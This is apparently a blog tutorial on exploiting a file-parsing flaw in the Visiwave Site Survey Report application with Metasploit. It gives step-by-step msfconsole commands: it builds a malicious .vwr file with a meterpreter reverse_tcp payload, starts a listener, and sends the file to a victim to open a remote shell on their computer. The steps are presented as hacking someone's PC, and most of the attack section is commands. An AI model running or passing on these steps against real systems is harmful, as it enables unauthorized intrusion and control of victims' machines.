Hack Remote PC using Visiwave VWR File Parsing Vulnerability

This module exploits a vulnerability found in Visiwave Site Survey Report application. When processing .VWR files, VisiWaveReport.exe attempts to match a valid pointer based on the ‘Type’ property (valid ones include ‘Properties’, ‘Title Page’, ‘Details’, ‘Graph’, ‘Table’, ‘Text’, ‘Image’), but if a match isn’t found, the function that’s supposed to handle this routine ends up returning the input as a pointer, and later used in a CALL DWORD PTR [EDX+10] instruction. This allows attackers to overwrite it with any arbitrary value, and results code execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. NOTE: During installation, the application will register two file handles, VWS and VWR and allows a victim user to ‘double click’ the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP.

Exploit Targets


Windows XP SP2


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/visiwave_vwr_type

Msf exploit (visiwave_vwr_type)>set payload windows/meterpreter/reverse_tcp

Msf exploit (visiwave_vwr_type)>set lhost (IP of Local Host)

Msf exploit (visiwave_vwr_type)>exploit

After we successfully generate the malicious File, it will stored on your local computer


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost


Now send your msf.vwr files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

1 Comment Hack Remote PC using Visiwave VWR File Parsing Vulnerability

  1. exclusivehack

    Thanks for a marvelous posting! I genuinely enjoyed reading it, you could be a great author. I will be sure to bookmark your blog and definitely will come back in the future. I want to encourage yourself to continue your great posts, have a nice afternoon!


Leave a Reply

Your email address will not be published. Required fields are marked *